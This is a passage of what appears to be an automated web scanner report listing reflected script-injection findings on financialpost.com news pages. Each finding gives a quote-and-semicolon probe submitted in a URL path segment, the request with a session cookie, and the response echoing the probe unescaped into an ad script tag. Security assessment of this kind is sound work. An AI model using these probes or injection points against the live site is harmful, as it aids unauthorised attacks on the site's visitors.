Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38125


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe%20north%20america/3996015/5d6b5';2734327df9e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe%20north%20america;kw=3996015;kw=5d6b5';2734327df9e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+
...[SNIP]...

1.179. http://www.financialpost.com/news/energy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61908'%3b80f0b405c4b was submitted in the REST URL parameter 1. This input was echoed as 61908';80f0b405c4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news61908'%3b80f0b405c4b/energy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36429


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news61908';80f0b405c4b/energy/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news61908';80f0b405c4b;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=57288344?">
...[SNIP]...

1.180. http://www.financialpost.com/news/energy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ef9'%3b742404652a1 was submitted in the REST URL parameter 2. This input was echoed as f4ef9';742404652a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energyf4ef9'%3b742404652a1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36392


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energyf4ef9';742404652a1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energyf4ef9';742404652a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=72215600?">
...[SNIP]...

1.181. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96160'%3bf94decf6ed was submitted in the REST URL parameter 1. This input was echoed as 96160';f94decf6ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news96160'%3bf94decf6ed/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75926
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news96160';f94decf6ed/energy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news96160';f94decf6ed;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50020139?">
...[SNIP]...

1.182. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44511'%3b8f538e1d670 was submitted in the REST URL parameter 2. This input was echoed as 44511';8f538e1d670 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy44511'%3b8f538e1d670/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 89223
Expires: Sun, 19 Dec 2010 03:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy44511';8f538e1d670/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy44511';8f538e1d670;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68677683?">
...[SNIP]...

1.183. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3480f'%3bb1bf66ee4c8 was submitted in the REST URL parameter 4. This input was echoed as 3480f';b1bf66ee4c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy/Suncor+deal+with+Total+directional+shift+says/39959423480f'%3bb1bf66ee4c8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70550
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor-deal-with-total-directional-shift-says/39959423480f';b1bf66ee4c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor-deal-with-total-directional-shift-says;kw=39959423480f';b1bf66ee4c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookie
...[SNIP]...

1.184. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa269'%3b0b5f135b547 was submitted in the REST URL parameter 5. This input was echoed as aa269';0b5f135b547 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/aa269'%3b0b5f135b547 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38763


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor%20deal%20with%20total%20directional%20shift%20says/3995942/aa269';0b5f135b547/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor%20deal%20with%20total%20directional%20shift%20says;kw=3995942;kw=aa269';0b5f135b547;kw=npo;kw=fpo;tile='+dartad_t
...[SNIP]...

1.185. http://www.financialpost.com/news/financials/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d120'%3b5f07c23c576 was submitted in the REST URL parameter 1. This input was echoed as 1d120';5f07c23c576 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news1d120'%3b5f07c23c576/financials/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news1d120';5f07c23c576/financials/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news1d120';5f07c23c576;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44865092?">
...[SNIP]...

1.186. http://www.financialpost.com/news/financials/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a363'%3be5e52d355ae was submitted in the REST URL parameter 2. This input was echoed as 5a363';e5e52d355ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials5a363'%3be5e52d355ae/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials5a363';e5e52d355ae/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials5a363';e5e52d355ae;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=51799081?">
...[SNIP]...

1.187. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7a32'%3ba2f5d539c94 was submitted in the REST URL parameter 1. This input was echoed as a7a32';a2f5d539c94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsa7a32'%3ba2f5d539c94/financials/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85990
Expires: Sun, 19 Dec 2010 03:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsa7a32';a2f5d539c94/financials/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsa7a32';a2f5d539c94;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16955960?">
...[SNIP]...

1.188. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3c6'%3bfd6bcf5f23 was submitted in the REST URL parameter 2. This input was echoed as 4c3c6';fd6bcf5f23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials4c3c6'%3bfd6bcf5f23/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 93245
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials4c3c6';fd6bcf5f23/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials4c3c6';fd6bcf5f23;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10193409?">
...[SNIP]...

1.189. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6154'%3b04265ffa851 was submitted in the REST URL parameter 4. This input was echoed as e6154';04265ffa851 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials/steps+plate/3996039e6154'%3b04265ffa851/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76201
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps-plate/3996039e6154';04265ffa851/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps-plate;kw=3996039e6154';04265ffa851;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=59123382?
...[SNIP]...

1.190. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf56e'%3bd1d11237fe0 was submitted in the REST URL parameter 5. This input was echoed as cf56e';d1d11237fe0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials/steps+plate/3996039/cf56e'%3bd1d11237fe0 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37971


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps%20plate/3996039/cf56e';d1d11237fe0/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps%20plate;kw=3996039;kw=cf56e';d1d11237fe0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=172
...[SNIP]...

1.191. http://www.financialpost.com/news/legal/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/legal/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9749c'%3bea6b87ad49c was submitted in the REST URL parameter 1. This input was echoed as 9749c';ea6b87ad49c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news9749c'%3bea6b87ad49c/legal/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
